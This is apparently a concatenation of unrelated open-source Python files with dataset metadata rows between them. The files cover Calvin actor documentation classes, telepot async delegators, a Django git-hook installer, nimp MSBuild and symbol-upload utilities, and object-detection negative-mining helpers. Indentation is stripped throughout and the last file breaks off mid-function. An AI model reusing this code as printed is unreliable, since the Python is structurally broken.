def __init__(self, namespace, name, short_desc):
docs = short_desc or "Unknown error"
super(ErrorDoc, self).__init__(namespace, name, docs)
self.label = "Error"
def search(self, search_list):
_log.debug("Actor module {}/ is missing file __init__.py".format(self.ns))
return self
class ModuleDoc(DocObject):
"""docstring for ModuleDoc"""
COMPACT_FMT = """
{{{qualified_name}}}
{{{short_desc}}}
{{#modules_compact}}
Modules: {{{modules_compact}}}
{{/modules_compact}}
{{#actors_compact}}
Actors: {{{actors_compact}}}
{{/actors_compact}}
"""
DETAILED_FMT_PLAIN = """
============================================================
{{{label}}}: {{{qualified_name}}}
============================================================
{{{docs}}}
{{#has_modules}}
Modules:
{{/has_modules}}
{{#modules}}
{{{own_name}}} : {{{short_desc}}}
{{/modules}}
{{#has_actors}}
Actors:
{{/has_actors}}
{{#actors}}
{{{own_name}}} : {{{short_desc}}}
{{/actors}}
"""
DETAILED_FMT_MD = """
## {{{label}}}: {{{e_qualified_name}}} {{#use_links}}<a name="{{{slug}}}"></a>{{/use_links}}
{{{e_docs}}}
{{#has_modules}}
### Modules:
{{/has_modules}}
{{#modules}}
{{#use_links}}[**{{{e_own_name}}}**](#{{{slug}}}){{/use_links}}{{^use_links}}**{{{e_own_name}}}**{{/use_links}} : {{{e_short_desc}}}
{{/modules}}
{{#has_actors}}
### Actors:
{{/has_actors}}
{{#actors}}
{{#use_links}}[**{{{e_own_name}}}**](#{{{slug}}}){{/use_links}}{{^use_links}}**{{{e_own_name}}}**{{/use_links}} : {{{e_short_desc}}}
{{/actors}}
{{#use_links}}[\[Top\]](#Calvin){{/use_links}}
***
"""
def __init__(self, namespace, modules, actors, doclines):
super(ModuleDoc, self).__init__(namespace, None, doclines)
self.modules = modules
self.actors = actors
self.label = "Module"
@property
def has_actors(self):
return bool(self.actors)
@property
def has_modules(self):
return bool(self.modules)
@property
def modules_compact(self):
return ", ".join([x.own_name for x in self.modules if type(x) is not ErrorDoc])
@property
def actors_compact(self):
return ", ".join([x.own_name for x in self.actors if type(x) is not ErrorDoc])
def search(self, search_list):
if not search_list:
return self
name = search_list.pop(0)
for x in self.modules:
if name == x.ns:
return x.search(search_list)
for x in self.actors:
if name == x.name:
if not search_list:
return x
return None # Error
return None
def metadata(self):
metadata = super(ModuleDoc, self).metadata()
metadata['modules'] = [x.ns for x in self.modules]
metadata['actors'] = [x.name for x in self.actors]
return metadata
class ActorDoc(DocObject):
"""docstring for ActorDoc"""
COMPACT_FMT = """
{{{qualified_name}}}({{{fargs}}})
{{{short_desc}}}
{{#has_inports}}Inports: {{{inports_compact}}}{{/has_inports}}
{{#has_outports}}Outports: {{{outports_compact}}}{{/has_outports}}
{{#has_requirements}}Requires: {{{requires_compact}}}{{/has_requirements}}
"""
DETAILED_FMT_PLAIN = """
============================================================
{{{label}}}: {{{qualified_name}}}({{{fargs}}})
============================================================
{{{docs}}}
{{#has_inports}}
Inports:
{{/has_inports}}
{{#inports}}
{{{name}}} : {{{docs}}} {{#props}}Properties({{{props}}}){{/props}}
{{/inports}}
{{#has_outports}}
Outports:
{{/has_outports}}
{{#outports}}
{{{name}}} : {{{docs}}} {{#props}}Properties({{{props}}}){{/props}}
{{/outports}}
{{#has_requirements}}
Requires:
{{{requires_compact}}}
{{/has_requirements}}
"""
DETAILED_FMT_MD = """
## {{{label}}}: {{{e_qualified_name}}}({{{e_fargs}}}) {{#use_links}}<a name="{{{slug}}}"></a>{{/use_links}}
{{{e_docs}}}
{{#has_inports}}
### Inports:
{{/has_inports}}
{{#inports}}
**{{{e_name}}}** : {{{e_docs}}} {{#props}}_Properties({{{e_props}}})_{{/props}}
{{/inports}}
{{#has_outports}}
### Outports:
{{/has_outports}}
{{#outports}}
**{{{e_name}}}** : {{{e_docs}}} {{#props}}_Properties({{{e_props}}})_{{/props}}
{{/outports}}
{{#has_requirements}}
### Requires:
{{{e_requires_compact}}}
{{/has_requirements}}
{{#use_links}}[\[Top\]](#Calvin) [\[Module: {{{e_ns}}}\]](#{{{ns}}}){{/use_links}}
***
"""
def __init__(self, namespace, name, args, inputs, outputs, doclines, requires):
super(ActorDoc, self).__init__(namespace, name, doclines)
self.args = args
self.inports = [PortDoc(namespace='in', name=pn, docs=pd, properties=pp) for pn, pd, pp in inputs]
self.outports = [PortDoc(namespace='out', name=pn, docs=pd, properties=pp) for pn, pd, pp in outputs]
self.input_properties = {pn:pp for pn, _, pp in inputs}
self.output_properties = {pn:pp for pn, _, pp in outputs}
self.inputs = [pn for pn, _, _ in inputs]
self.outputs = [pn for pn, _, _ in outputs]
self.requires = sorted(requires)
self.label = "Actor"
@property
def has_inports(self):
return bool(self.inports)
@property
def has_outports(self):
return bool(self.outports)
@property
def has_requirements(self):
return bool(self.requires)
@property
def fargs(self):
def _escape_string_arg(arg):
if type(arg) == str or type(arg) == unicode:
# Handle \n, \r etc
return '"{}"'.format(arg).encode('string_escape')
if arg is True:
return 'true'
if arg is False:
return 'false'
if arg is None:
return 'null'
return arg
# return '"{}"'.format(arg)
return ", ".join(self.args['mandatory'] + ["{}={}".format(k, _escape_string_arg(v)) for k,v in self.args['optional'].iteritems()])
@property
def inports_compact(self):
return ", ".join(self.inputs)
@property
def outports_compact(self):
return ", ".join(self.outputs)
@property
def requires_compact(self):
return ", ".join(self.requires)
def metadata(self):
metadata = {
'ns': self.ns,
'name': self.name,
'type': 'actor',
'args': self.args,
'inputs': self.inputs,
'input_properties': self.input_properties,
'outputs': self.outputs,
'output_properties': self.output_properties,
'requires': self.requires,
'is_known': True
}
return metadata
class PortDoc(DocObject):
def __init__(self, namespace, name, docs, properties):
super(PortDoc, self).__init__(namespace, name, docs)
self.properties = properties;
@property
def props(self):
def _fmt_val(v):
if type(v) is not list:
return str(v)
l = ", ".join(v)
return "[{}]".format(l) if l else ""
res = ", ".join(["{}:{}".format(k, _fmt_val(v)) for k,v in self.properties.iteritems()])
return res
class ComponentDoc(ActorDoc):
#
# Augment a couple of methods in the superclass
#
def __init__(self, namespace, name, args, inputs, outputs, doclines, definition):
# FIXME: Build requirements by recursing definition
requires = []
super(ComponentDoc, self).__init__(namespace, name, args, inputs, outputs, doclines, requires)
self.definition = definition
self.label = "Component"
def metadata(self):
metadata = super(ComponentDoc, self).metadata()
metadata['type'] = 'component'
metadata['definition'] = self.definition
return metadata
if __name__ == '__main__':
def test_all_formatters(d):
print "\n%s\n=======================" % (d.__class__.__name__,)
for formatter in [d.compact, d.detailed, d.markdown, d.markdown_links]:
print "%s:\n-----------------------" % (formatter.__name__,)
print formatter()
# d = DocObject('yadda')
# test_all_formatters(d)
# d = ErrorDoc('foo', 'Bar', 'short error description')
# test_all_formatters(d)
# #
# d = ModuleDoc('root', [ModuleDoc('std', [], [], 'std short description'), ModuleDoc('io', [], [], 'io short description')], [], 'short description')
# test_all_formatters(d)
#
doclines = """actor yaddda, yadda
Even more
"""
a = ActorDoc('std', 'Comp', {'mandatory':['x', 'y'], 'optional':{'z':1}}, [('in1', 'anything', {}), ('in2', 'something', {})], [('out', 'token', {'foo':['apa', 'banan']})], doclines, [])
test_all_formatters(a)
# c = ComponentDoc('std', 'Args', {'mandatory':['x', 'y'], 'optional':{'z':1}}, [('in1', 'anything', 'property'), ('in2', 'something', 'property')], [('out', 'token', 'property')], doclines, ['alpha', 'beta'], {})
# test_all_formatters(c)
#
# d = ModuleDoc('std', [], [a, c], 'short description')
# test_all_formatters(d)
| apache-2.0 | 6,147,491,349,579,409,000 | 28.072398 | 217 | 0.524358 | false |
mpunkenhofer/irc-telegram-bot | telepot/telepot/aio/delegate.py | 1 | 3780 | """
Like :mod:`telepot.delegate`, this module has a bunch of seeder factories
and delegator factories.
.. autofunction:: per_chat_id
.. autofunction:: per_chat_id_in
.. autofunction:: per_chat_id_except
.. autofunction:: per_from_id
.. autofunction:: per_from_id_in
.. autofunction:: per_from_id_except
.. autofunction:: per_inline_from_id
.. autofunction:: per_inline_from_id_in
.. autofunction:: per_inline_from_id_except
.. autofunction:: per_application
.. autofunction:: per_message
.. autofunction:: per_event_source_id
.. autofunction:: per_callback_query_chat_id
.. autofunction:: per_callback_query_origin
.. autofunction:: until
.. autofunction:: chain
.. autofunction:: pair
.. autofunction:: pave_event_space
.. autofunction:: include_callback_query_chat_id
.. autofunction:: intercept_callback_query_origin
"""
import asyncio
import traceback
from .. import exception
from . import helper
# Mirror traditional version to avoid having to import one more module
from ..delegate import (
per_chat_id, per_chat_id_in, per_chat_id_except,
per_from_id, per_from_id_in, per_from_id_except,
per_inline_from_id, per_inline_from_id_in, per_inline_from_id_except,
per_application, per_message, per_event_source_id,
per_callback_query_chat_id, per_callback_query_origin,
until, chain, pair, pave_event_space,
include_callback_query_chat_id, intercept_callback_query_origin
)
def _ensure_coroutine_function(fn):
return fn if asyncio.iscoroutinefunction(fn) else asyncio.coroutine(fn)
def call(corofunc, *args, **kwargs):
"""
:return:
a delegator function that returns a coroutine object by calling
``corofunc(seed_tuple, *args, **kwargs)``.
"""
corofunc = _ensure_coroutine_function(corofunc)
def f(seed_tuple):
return corofunc(seed_tuple, *args, **kwargs)
return f
def create_run(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a coroutine object by calling the object's ``run`` method, which should be
a coroutine function.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
return _ensure_coroutine_function(j.run)()
return f
def create_open(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a looping coroutine object that uses the object's ``listener`` to wait for
messages and invokes instance method ``open``, ``on_message``, and ``on_close``
accordingly.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
async def wait_loop():
bot, msg, seed = seed_tuple
try:
handled = await helper._yell(j.open, msg, seed)
if not handled:
await helper._yell(j.on_message, msg)
while 1:
msg = await j.listener.wait()
await helper._yell(j.on_message, msg)
# These exceptions are "normal" exits.
except (exception.IdleTerminate, exception.StopListening) as e:
await helper._yell(j.on_close, e)
# Any other exceptions are accidents. **Print it out.**
# This is to prevent swallowing exceptions in the case that on_close()
# gets overridden but fails to account for unexpected exceptions.
except Exception as e:
traceback.print_exc()
await helper._yell(j.on_close, e)
return wait_loop()
return f
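# Wiring sketch (assumes telepot.aio.DelegatorBot and a user-defined
# ChatHandler subclass; TOKEN is a placeholder):
#   import telepot.aio
#   from telepot.aio.helper import ChatHandler
#   class MyHandler(ChatHandler):
#       async def on_chat_message(self, msg):
#           await self.sender.sendMessage('echo: %s' % msg.get('text'))
#   bot = telepot.aio.DelegatorBot(TOKEN, [
#       pave_event_space()(per_chat_id(), create_open, MyHandler, timeout=10),
#   ])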
| mit | -7,109,834,925,645,704,000 | 35 | 87 | 0.643915 | false |
rentlytics/django-zerodowntime | zerodowntime/management/commands/install_git_hooks.py | 1 | 1517 | import os
import stat
from django.core.management import BaseCommand
COMMIT_MSG_HOOK = """
# BEGIN ZERODOWNTIME_COMMIT_MSG_HOOK
commit_regex='(\[allow\-unsafe\-migrations]|merge)'
if ! grep -iqE "$commit_regex" "$1"; then
source ./venv/bin/activate
./manage.py check_migrations
migration_check=$?
if [ $migration_check != 0 ]; then
echo "Aborting commit, caused by migrations incompatible with ZDCD." >&2
echo "To skip this check you can add '[allow-unsafe-migrations]' to your commit message." >&2
exit $migration_check
fi;
fi;
# END ZERODOWNTIME_COMMIT_MSG_HOOK
"""
class Command(BaseCommand):
help = 'Installs a git commit-msg hook which will ' \
'execute `./manage.py check_migrations` unless ' \
'the commit message contains "[allow-unsafe-migrations]"'
HOOK_PATH = '.git/hooks/'
def handle(self, *args, **options):
commit_msg_path = os.path.join(self.HOOK_PATH, 'commit-msg')
hook_exists = os.path.exists(commit_msg_path)
if hook_exists:
with open(commit_msg_path, 'r') as fp:
hook_content = fp.read()
else:
hook_content = '#!/usr/bin/env bash\n\n'
if 'ZERODOWNTIME_COMMIT_MSG_HOOK' not in hook_content:
hook_content += COMMIT_MSG_HOOK
with open(commit_msg_path, 'w') as fp:
fp.write(hook_content)
st = os.stat(commit_msg_path)
os.chmod(commit_msg_path, st.st_mode | stat.S_IEXEC)
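# Usage sketch (assumes this app is in INSTALLED_APPS and the working
# directory is the repository root, so .git/hooks exists):
#   $ ./manage.py install_git_hooks
# Afterwards every commit runs `./manage.py check_migrations` unless the
# commit message contains "[allow-unsafe-migrations]".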
| isc | -4,212,104,457,324,079,600 | 28.745098 | 99 | 0.616348 | false |
dontnod/nimp | nimp/build.py | 1 | 16076 | # -*- coding: utf-8 -*-
# Copyright (c) 2014-2019 Dontnod Entertainment
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
''' Utilities related to compilation '''
import logging
import os
import glob
import socket
import subprocess
import re
import nimp.system
import nimp.sys.platform
import nimp.sys.process
def msbuild(project_file, platform_name, configuration, project=None,
vs_version='14', dotnet_version='4.6', additional_flags=None ):
''' Builds a project with MSBuild '''
# Windows
if nimp.sys.platform.is_windows():
msbuild_path = _find_msbuild_path(vs_version)
if msbuild_path is None:
return False
needCapture = True
# Mac and Linux alike
else:
msbuild_path = 'xbuild'
needCapture = False
command = [ msbuild_path, project_file,
'/verbosity:minimal',
'/nologo',
'/p:TargetFrameworkVersion=v' + dotnet_version,
'/p:TargetFrameworkProfile=' ]
if project is not None:
command.append('/target:' + project)
if platform_name is not None:
platform_name = '"' + platform_name + '"' if ' ' in platform_name else platform_name
command.append('/p:Platform=' + platform_name)
if configuration is not None:
configuration = '"' + configuration + '"' if ' ' in configuration else configuration
command.append('/p:Configuration=' + configuration)
if additional_flags is not None:
command += additional_flags
result, output, _ = nimp.sys.process.call(command, capture_output=needCapture)
if nimp.sys.platform.is_windows() and 'Cannot run if when setup is in progress.' in output:
logging.error('Visual Studio appears to have failed')
return False
return result == 0
def vsbuild(solution, platform_name, configuration, project=None,
vs_version='14', target='Build', dotnet_version='4.6', use_msbuild=False):
''' Builds a project with Visual Studio '''
# Windows
if nimp.sys.platform.is_windows():
if use_msbuild:
msbuild_path = _find_msbuild_path(vs_version)
if msbuild_path is None:
logging.error('Unable to find Visual Studio %s', vs_version)
return False
command = [ msbuild_path, solution, '/verbosity:minimal', '/nologo',
'/p:Configuration=' + configuration,
'/p:Platform=' + platform_name,
'/p:TargetFrameworkVersion=v' + dotnet_version,
'/p:TargetFrameworkProfile=']
if project is not None:
command = command + ['/target:' + project]
else:
devenv_path = _find_devenv_path(vs_version)
if devenv_path is None:
logging.error('Unable to find Visual Studio %s', vs_version)
return False
command = [ devenv_path, solution ]
command = command + [ '/' + target, configuration + '|' + platform_name ]
if project is not None:
command = command + [ '/project', project ]
result, output, _ = nimp.sys.process.call(command, capture_output=True)
if 'Cannot run if when setup is in progress.' in output:
logging.error('Visual Studio appears to have failed')
return False
return result == 0
# Mac and Linux alike
command = [ 'xbuild', solution, '/verbosity:quiet', '/nologo',
'/p:Configuration=' + configuration,
'/p:Platform=' + platform_name,
'/p:TargetFrameworkVersion=v' + dotnet_version,
'/p:TargetFrameworkProfile=' ]
if project is not None:
command = command + [ '/target:' + project ]
return nimp.sys.process.call(command) == 0
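# Example invocation (a sketch; solution, platform and project names are
# placeholders):
#   ok = vsbuild('Game.sln', 'Win64', 'Development',
#                project='GameEditor', vs_version='2017', target='Build')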
def _find_msbuild_path(vs_version):
msbuild_path = None
# Sanitize vs_version
if vs_version == '2015':
vs_version = '14.0'
if vs_version == '2017':
vs_version = '15.0'
if vs_version == '2019':
# Changed path : MSBuild is installed in the \Current folder
# https://docs.microsoft.com/en-us/visualstudio/msbuild/whats-new-msbuild-16-0?view=vs-2019
vs_version = 'Current'
# For VS2017 and later, there is vswhere
vswhere_cmd = [ os.path.join(os.environ['ProgramFiles(x86)'], 'Microsoft Visual Studio/Installer/vswhere.exe') ]
vswhere_cmd += [ '-products', '*', '-requires', 'Microsoft.Component.MSBuild', '-property', 'installationPath' ]
result, output, _ = nimp.sys.process.call(vswhere_cmd, capture_output=True, hide_output=True)
if result == 0:
for line in output.split('\n'):
line = line.strip()
msbuild_path = os.path.join(line, 'MSBuild', vs_version, 'Bin', 'MSBuild.exe')
if os.path.exists(msbuild_path):
break
if not msbuild_path or not os.path.exists(msbuild_path):
logging.error('Unable to find MSBuild %s (%s)', vs_version, msbuild_path)
return None
msbuild_path = os.path.normpath(msbuild_path)
return msbuild_path
def _find_devenv_path(vs_version):
devenv_path = None
# Sanitize vs_version
if vs_version == '2015':
vs_version = '14'
if vs_version == '2017':
vs_version = '15'
if vs_version == '2019':
vs_version = '16'
# First try the registry, because the environment variable is unreliable
# (case of Visual Studio installed on a different drive; it still sets
# the envvar to point to C:\Program Files even if devenv.com is on D:\)
#pylint: disable=import-error
from winreg import OpenKey, QueryValue, HKEY_LOCAL_MACHINE
key_path = 'SOFTWARE\\Classes\\VisualStudio.accessor.' + vs_version + '.0\\shell\\Open'
try:
with OpenKey(HKEY_LOCAL_MACHINE, key_path) as key:
cmdline = QueryValue(key, 'Command')
if cmdline[:1] == '"':
cmdline = cmdline.split('"')[1]
elif ' ' in cmdline:
cmdline = cmdline.split(' ')[0]
devenv_path = cmdline.replace('devenv.exe', 'devenv.com')
#pylint: disable=broad-except
except Exception:
pass
# For VS2017 and later, there is vswhere
if not devenv_path:
vswhere_path = os.path.join(os.environ['ProgramFiles(x86)'], 'Microsoft Visual Studio/Installer/vswhere.exe')
result, output, _ = nimp.sys.process.call([vswhere_path], capture_output=True, hide_output=True)
if result == 0:
for line in output.split('\n'):
line = line.strip()
if 'installationPath: ' in line:
candidate = line.split(' ', 1)[1]
elif 'installationVersion: ' + vs_version in line:
devenv_path = os.path.join(candidate, 'Common7/IDE/devenv.com')
break
# If the registry key is unhelpful, try the environment variable
if not devenv_path:
vstools_path = os.getenv('VS' + vs_version + '0COMNTOOLS')
if vstools_path is not None:
# Sanitize this because os.path.join sometimes gets confused
if vstools_path[-1] in [ '/', '\\' ]:
vstools_path = vstools_path[:-1]
devenv_path = os.path.join(vstools_path, '../../Common7/IDE/devenv.com')
if not devenv_path or not os.path.exists(devenv_path):
return None
devenv_path = os.path.normpath(devenv_path)
logging.info("Found Visual Studio at %s", devenv_path)
return devenv_path
def install_distcc_and_ccache():
""" Install environment variables suitable for distcc and ccache usage
if relevant.
"""
distcc_dir = '/usr/lib/distcc'
ccache_dir = '/usr/lib/ccache'
# Make sure distcc will be called if we use ccache
if os.path.exists(distcc_dir):
logging.info('Found distcc, so setting CCACHE_PREFIX=distcc')
os.environ['CCACHE_PREFIX'] = 'distcc'
# Add ccache to PATH if it exists, otherwise add distcc
if os.path.exists(ccache_dir):
extra_path = ccache_dir
elif os.path.exists(distcc_dir):
extra_path = distcc_dir
else:
return
logging.info('Adding %s to PATH', extra_path)
os.environ['PATH'] = extra_path + ':' + os.getenv('PATH')
if os.path.exists(distcc_dir):
# Set DISTCC_HOSTS if necessary
if not os.getenv('DISTCC_HOSTS'):
hosts = subprocess.Popen(['lsdistcc'], stdout=subprocess.PIPE).communicate()[0].decode('utf-8')
hosts = ' '.join(hosts.split())
logging.debug('Setting DISTCC_HOSTS=%s', hosts)
os.environ['DISTCC_HOSTS'] = hosts
# Compute a reasonable number of workers for UBT
if not os.getenv('UBT_PARALLEL'):
workers = subprocess.Popen(['distcc', '-j'], stdout=subprocess.PIPE).communicate()[0].decode('utf-8')
logging.debug('Setting UBT_PARALLEL=%s', workers)
os.environ['UBT_PARALLEL'] = workers
def upload_symbols(env, symbols, config):
''' Uploads build symbols to a symbol server '''
if not (env.is_win64 or env.is_xsx or env.is_ps5):
logging.error("Plafrom must be win64, xsx or ps5")
return False
def _discover_latest_autosdk(platform):
'''look for autoSDK on buildmachine '''
# TODO: get this out of here and in a more generic place like system for example
host_name = socket.gethostname()
is_build_worker = host_name.startswith('farmagent') or host_name.startswith('linuxagent')
platform = 'GDK' if platform in ['win64', 'xsx'] else platform
auto_sdk_root = 'D:/autoSDK/HostWin64/' + platform.upper()
if not is_build_worker or not os.path.exists(auto_sdk_root):
return None
possible_paths = os.listdir(auto_sdk_root)
if platform == 'ps5':
# possible flavours : PS5/2.00.00.09/NotForLicensees/2.000/
# possible flavours : PS5/2.000.009/NotForLicensees/2.000/
pattern = r'^\d?(\d).\d+.\d+?(.\d+)$'
else:
# possible flavours like GDK/200806/
pattern = r'^\d{6}$'
possible_paths = sorted([ p for p in possible_paths if re.match(pattern, p)], reverse=True )
if platform == 'ps5': # sort possible flavours like 2.00.00.89 and 2.000.089, sigh...
dotless_paths = sorted([ (path.replace('.', ''), path) for path in possible_paths ], reverse=True)
possible_paths = [ dot for dotless, dot in dotless_paths ]
if possible_paths != []: # second round of version guessing for ps5, sigh...
auto_sdk_root += '/' + possible_paths[0] + '/NotForLicensees/'
possible_paths = os.listdir(auto_sdk_root)
possible_paths = sorted([p for p in possible_paths if re.match(r'\d?(\d).\d+', p)], reverse=True)
if possible_paths == []:
return None
auto_sdk_root += '/' + possible_paths[0]
return auto_sdk_root
# create store if not available yet
store_root = nimp.system.sanitize_path(os.path.join(env.format(env.publish_symbols), env.platform.lower()))
if not os.path.exists(store_root):
nimp.system.safe_makedirs(store_root)
# find the tool to upload our symbols
sym_tool_path = "C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/symstore.exe"
if env.is_ps5: # ps5 sym tool
auto_sdk_root = _discover_latest_autosdk(env.platform)
prospero_local_root = os.getenv('SCE_PROSPERO_SDK_DIR', default=None)
assert prospero_local_root or auto_sdk_root
ps5_sdk_root = auto_sdk_root if auto_sdk_root else prospero_local_root
sym_tool_path = os.path.join(ps5_sdk_root, 'host_tools', 'bin', 'prospero-symupload.exe')
else: # autoSDK win10 sdk
win10_sdk_path = 'D:/autoSDK/HostWin64/Win64/Windows Kits/10/Debuggers/x64/symstore.exe'
if os.path.isfile(win10_sdk_path):
sym_tool_path = win10_sdk_path
sym_tool_path = nimp.system.sanitize_path(sym_tool_path)
logging.debug('Using sym tool path -> %s', sym_tool_path)
# Create response file
index_file = "symbols_index.txt"
with open(index_file, "w") as symbols_index:
for src, _ in symbols:
logging.debug("adding %s to response file %s" % (src, index_file))
symbols_index.write(src + "\n")
# transaction tag
transaction_comment = "{0}_{1}_{2}_{3}".format(env.project, env.platform, config, env.revision)
# common cmd params
compress = "/compress" if hasattr(env, 'compress') and env.compress else ""
cmd = [
sym_tool_path,
"add",
"/r", # Recursive
"/f", "@" + index_file, # add files from response file
"/s", store_root, # target symbol store
"/o", # Verbose output
compress, # compression
]
# platform specific cmd params
if env.is_ps5:
cmd += [
"/tag", transaction_comment, # tag symbols
]
if env.is_microsoft_platform:
cmd += [
"/t", env.project, # Product name
"/c", transaction_comment,
"/v", env.revision,
]
if env.dry_run:
logging.info('dry run : %s' % ' '.join(cmd))
if not env.dry_run:
if nimp.sys.process.call(cmd) != 0:
# Do not remove symbol index; keep it for later debugging
return False
os.remove(index_file)
return True
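# Usage sketch (hypothetical values; `env` is nimp's runtime environment and
# `symbols` holds (path, metadata) pairs as iterated above):
#   symbols = [('Binaries/Win64/Game.pdb', None)]
#   upload_symbols(env, symbols, 'Development')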
def get_symbol_transactions(symsrv):
''' Retrieves all symbol transactions from a symbol server '''
server_txt_path = os.path.join(symsrv, "000Admin", "server.txt")
if not os.path.exists(server_txt_path):
logging.error("Unable to find the file %s, aborting.", server_txt_path)
return None
line_re = re.compile(r"^(?P<id>\d*),"
r"(?P<operation>(add|del)),"
r"(?P<type>(file|ptr)),"
r"(?P<creation_date>\d{2}\/\d{2}\/\d{4}),"
r"(?P<creation_time>\d{2}:\d{2}:\d{2}),"
r"\"(?P<product_name>[^\"]*)\","
r"\"(?P<version>[^\"]*)\","
r"\"(?P<comment>[^\"]*)\",$")
transaction_infos = []
with open(server_txt_path, "r") as server_txt:
for line in server_txt.readlines():
match = line_re.match(line)
if not match:
logging.error("%s is not recognized as a server.txt transaction entry", line)
return None
transaction_infos += [match.groupdict()]
return transaction_infos
def delete_symbol_transaction(symsrv, transaction_id):
''' Deletes a symbol transaction from a Microsoft symbol repository '''
command = [ "C:/Program Files (x86)/Windows Kits/8.1/Debuggers/x64/symstore.exe",
"del",
"/i",
transaction_id,
"/s",
symsrv]
if nimp.sys.process.call(command) != 0:
return False
return True
| mit | 5,637,544,502,031,619,000 | 40.647668 | 117 | 0.602762 | false |
jccaicedo/localization-agent | utils/libLearning.py | 1 | 10431 | import numpy as np
import utils as cu
import libDetection as det
import dataProcessor as dp
from utils import emptyMatrix
###############################################
# Hard Negative Mining
###############################################
class HardNegativeMining():
def __init__(self,currentModel,maxVectorsPerImage):
self.currentModel = currentModel
self.maxVectorsPerImage = maxVectorsPerImage
def run(self,img,features,bboxes):
pred = self.currentModel.predict(features,bboxes)
candidates = pred > -1.0001
f = features[candidates]
p = pred[candidates]
bboxes = [bboxes[i] for i in range(len(bboxes)) if candidates[i]]
# Sort candidate detections by score
s = np.argsort(p)
j = min(2*self.maxVectorsPerImage,f.shape[0])
# Keep top candidates only
if j > 0:
return (f[ s[-j:] ], p[ s[-j:] ], bboxes)
else:
return None
def getHardNegatives(negativesDir,negativesList,featuresExt,numFeatures,maxVectors,currentModel):
maxVectorsPerImage = maxVectors/len(negativesList)
i = 0
task = HardNegativeMining(currentModel,maxVectorsPerImage)
result = dp.processData(negativesList,negativesDir,featuresExt,task)
hardng = emptyMatrix([2*maxVectors,numFeatures])
boxes = []
while len(result) > 0:
data = result.pop(0)
if data[0].shape[0]+i > hardng.shape[0]:
print 'Not enough matrix space'
hardng = np.concatenate( (hardng,emptyMatrix([maxVectors,numFeatures])) )
hardng[i:i+data[0].shape[0],:] = data[0]
boxes += data[2]
i = i + data[0].shape[0]
return hardng[0:i,:],boxes[0:i]
###############################################
# Random Negative Windows Filter
###############################################
class RandomNegativesFilter():
def __init__(self,numFeatures,randomBoxes):
self.numFeatures = numFeatures
self.randomBoxes = randomBoxes
def run(self,img,features,bboxes):
boxes = range(0,features.shape[0])
cu.rnd.shuffle(boxes)
m = min(features.shape[0],self.randomBoxes)
bboxes = [bboxes[i] for i in boxes]
return (features[boxes[0:m]],bboxes)
def getRandomNegs(featuresDir,negativeList,featuresExt,numFeatures,maxVectors,maxNegativeImages):
randomBoxes = maxVectors/maxNegativeImages
cu.rnd.shuffle(negativeList)
task = RandomNegativesFilter(numFeatures,randomBoxes)
negatives = [negativeList.pop(0) for i in range(maxNegativeImages)]
result = dp.processData(negatives,featuresDir,featuresExt,task)
neg = emptyMatrix([maxVectors,numFeatures])
boxes = []
n = 0
while len(result) > 0:
mat,box = result.pop()
neg[n:n+mat.shape[0]] = mat
n = n + mat.shape[0]
boxes += box
return (neg[0:n],boxes[0:n])
###############################################
# Negative-Windows-From-Positive-Images Filter
###############################################
class NWFPIFilter():
def __init__(self,groundTruths,featuresDir,featuresExt,maxNegatives,overlap,model):
self.groundTruths = groundTruths
self.featuresDir = featuresDir
self.featuresExt = featuresExt
self.maxNegatives = maxNegatives
self.overlap = overlap
self.model = model
def rank(self,img,features,bboxes):
pred = self.model.predict(features,bboxes)
candidates = pred > -1.0001
f = features[candidates]
b = [bboxes[t] for t in range(len(bboxes)) if candidates[t]]
p = pred[candidates]
# Sort candidate detections by score
s = np.argsort(p)
j = min(2*self.maxNegatives,f.shape[0])
# Keep top candidates only
if j > 0:
return (f[ s[-j:] ], [ b[t] for t in s[-j:] ])
else:
return None,None
def run(self,img,features,bboxes):
if self.model:
features,bboxes = self.rank(img,features,bboxes)
if features == None:
return ([],[],[],[])
positives,negatives = [],[]
imageData = self.groundTruths[img]
for i in range( len(bboxes) ):
isPositive,isNegative = False,False
for j in imageData:
o = det.IoU(j,map(float,bboxes[i][1:]))
if o >= 0.85:
isPositive = True
break
elif self.overlap >= o and o > 0:
isNegative = True
if isPositive:
positives.append(i)
if isNegative:
negatives.append(i)
if self.model:
negatives.reverse()
else:
cu.rnd.shuffle(negatives)
posIdx = [bboxes[t] for t in positives]
posFeat = [features[positives]]
negIdx = [bboxes[t] for t in negatives[0:self.maxNegatives]]
negFeat = [features[negatives[0:self.maxNegatives]]]
return (posIdx,posFeat,negIdx,negFeat)
def selectNegativeWindowsFromPositiveImages(groundTruths,featuresDir,featuresExt,maxVectors,overlap,model=False):
gtb = dict()
for x in groundTruths:
im,bx = x[0],map(float,x[1:])
try:
gtb[im].append(bx)
except:
gtb[im] = [bx]
task = NWFPIFilter(gtb,featuresDir,featuresExt,maxVectors/len(gtb.keys()),overlap,model)
result = dp.processData(gtb.keys(),featuresDir,featuresExt,task)
posIdx,posFeat,negIdx,negFeat = [],[],[],[]
for r in result:
posIdx += r[0]
posFeat += r[1]
negIdx += r[2]
negFeat += r[3]
Xp = emptyMatrix( (len(posIdx),posFeat[0].shape[1]) )
